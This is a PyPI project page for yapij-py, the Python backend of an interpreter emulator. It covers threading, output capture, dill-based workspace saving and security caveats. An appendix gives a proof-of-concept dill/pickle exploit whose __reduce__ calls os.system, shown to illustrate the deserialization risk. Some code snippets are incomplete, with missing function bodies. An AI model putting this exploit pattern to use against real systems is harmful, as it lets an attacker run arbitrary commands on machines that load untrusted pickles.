Skip to main content
Help the Python Software Foundation raise $60,000 USD by December 31st!  Building the PSF Q4 Fundraiser

Python-side of YAPIJ js-to-python interpreter.

Project description

yapij-python: Python-side of yapij package.

Implementation Details

There are two key challenges that one faces when implementing an interpreter emulator:

  1. Catching and processing program output.
  2. Interrupting code before it is completed.

At the same time, we'd also like:

  1. The ability to send other commands to the python process while code is running. For example, save a workspace while code is running.
  2. Check on the health of the process with a heartbeat.

The main ingredients of the solution are:

  1. Multi-threading for a main interface, the interpreter, and a heartbeat.
  2. asyncio scheduling off the main loop.
  3. Context managers that overwrite sys.stdout and sys.stderr with an emulator. Appropriate placement of the context managers are key!

Misc. Details

Placement of context managers

A context manager that is called within a thread will "bubble up" to parent threads so long as it is running. See the appendix example. (However, there is no "bubbling down" from parent to child threads.)

This is problematic in our context because the threads will run as long as the context. (Therefore, Thread.join is not an option.)

Therefore, we place catch_output - the main context manager that formats print statements, exceptions, and sys.stdout in general - in the child thread ExecSession. This thread executes commands sent to the editor.

All such similar statements in the main thread are also handled by catch_output due to the "bubbling up" behavior.

Rejected Alternatives

  • Use standard exec and runpy to excute input:
    • Built-in module code provides InteractiveInterpreter and InteractiveConsole classes for doing just this.
    • Running code on instances of these objects still blocks. Therefore, does nothing for the KeyboardInterrupt problem.
    • Also do nothing for the last line print.

Known Issues and Limitations



  • The session interpreter runs on its own thread. Therefore, certain applications may not run as expected.
  • For example, the signal module cannot run on a non-main thread.
  • Consider flipping around so that "main" thread is ExecSession.

sys.stdout and sys.stderr

  • In order to communicate with the node process, sys.stdout and sys.stderr are overridden with an instance of a custom class ZMQIOWrapper.
  • The custom class is built to emulate the classes underlying sys.stdout. In particular, it inherits class io.TextIOWrapper.
  • However, full equivelance is not gauranteed at this time.
  • Moreover, attempts to re-route sys.stdout from within the interpreter may not work as expected or may fail to revert as expected.


The point of this module is to permit arbitrary code execution. It is by no means secure.

Workspace Manager

  • The workspace manager currently saves objects using the dill module, which is based on pickle
  • We use dill because it allows us to preserve the state of a huge range of objects.
  • The problem is that, if it is possible to pickle anything, then it will also be possible to pickle malicious code.
  • The current approach is to add a key to each file following the approach outlined here.
    • This will raise a flag and fail to load if the generated key does not match the data.
    • It cannot protect in cases where someone malicious correctly decodes then re-encodes a file (or puts malicious code in the file to start).
    • Thus, this is best thought of as a way of being protected from code that might be naively injected into the pickled workspace when it is transferred between two known users (i.e. via a poorly-executed man-in-the-middle attack.)
  • Further refinements might included using pickletools.dis to inspect files for red flags. (See the example code for what that spits out.)
    • This will still never be completely secure.
  • Jupyter Notebook stores keys in a separate db.

A "Safe Mode"?

  • It is really hard to do anything like a sandbox for python.
  • In Python 2.3 rexec was disabled due to "various known and not readily fixable security holes."
  • Therefore, we take the stance that - instead of trying to offer security some of the time - we will always allow arbitrary execution in the hopes that this keeps users vigilant.

Security Best Practices

Best practices for yapij are identical to best practices for running any python code:

  • Never load a workspace from someone that you do not know and trust.
  • Never install a python package that you do not know or trust.


  • Packaging is carried out with PyPRI.
  • A new version is compiled by a job (using .gitlab-ci.yaml) every time that the a new commit is pushed with version (I think it depends on a tag being added.)
  • Go to CLI to see the jobs.
  • Use pipreqs yapij to make requirements.txt


The main non-standard dependencies are:

  • pyzmq/zmq: "ØMQ is a lightweight and fast messaging implementation."
  • msgpack_python/msgpack: "MessagePack is an efficient binary serialization format. It lets you exchange data among multiple languages like JSON. But it's faster and smaller."
  • dill: "dill extends python’s pickle module for serializing and de-serializing python objects to the majority of the built-in python types."

We also provide custom serialization for NumPy arrays and Pandas dataframes. Thus, these become dependencies as well.



Michael Wooley



(Sorry, not my choice.)


A dill Exploit

Drawn from Kevin London's Dangerous Python Functions, Part 2

import os
import dill
import pickletools

# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        # Note: this will only list files in your directory.
        # It is a proof of concept.
        return (os.system, ('dir',))

def serialize_exploit():
    shellcode = dill.dumps({'e': Exploit(), 's': dill.dumps})
    return shellcode

def insecure_deserialize(exploit_code):

if __name__ == '__main__':
    shellcode = serialize_exploit()
    print('~'*80,'IF I CAN SEE YOUR FILES I CAN USUALLY DELETE THEM AS WELL', '~'*80, sep='\n')

    print('~'*80,'WHAT IF WE MADE USE OF SHELL CODE TO LOOK FOR RED FLAGS LIKE "REDUCE"?', '~'*80, sep='\n')

Context managers in a thread

import threading
import os
import sys
import contextlib
import copy

# Original
print_original = copy.copy(__builtins__.print)

def print_modified(*objects, sep=' ', end='\n', file=sys.stdout, flush=True):
  return print_original('[Context]', *objects, sep=sep, end=end, file=file, flush=flush)

def catch_output():
    __builtins__.print = print_modified
    __builtins__.print = print_original

class WorkerThread(threading.Thread):

  def run(self):
    with catch_output(False):
      print('Inside Context')
    print('Outside Context')

w = WorkerThread()

Will return something like:

[Context] Yep
[Context] Inside Context
Outside Context

Project details

Release history Release notifications | RSS feed

This version


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Files for yapij-py, version 999
Filename, size File type Python version Upload date Hashes
Filename, size yapij_py-999-py3-none-any.whl (27.7 kB) File type Wheel Python version py3 Upload date Hashes View
Filename, size yapij-py-999.tar.gz (26.3 kB) File type Source Python version None Upload date Hashes View

Supported by

Pingdom Pingdom Monitoring Google Google Object Storage and Download Analytics Sentry Sentry Error logging AWS AWS Cloud computing DataDog DataDog Monitoring Fastly Fastly CDN DigiCert DigiCert EV certificate StatusPage StatusPage Status page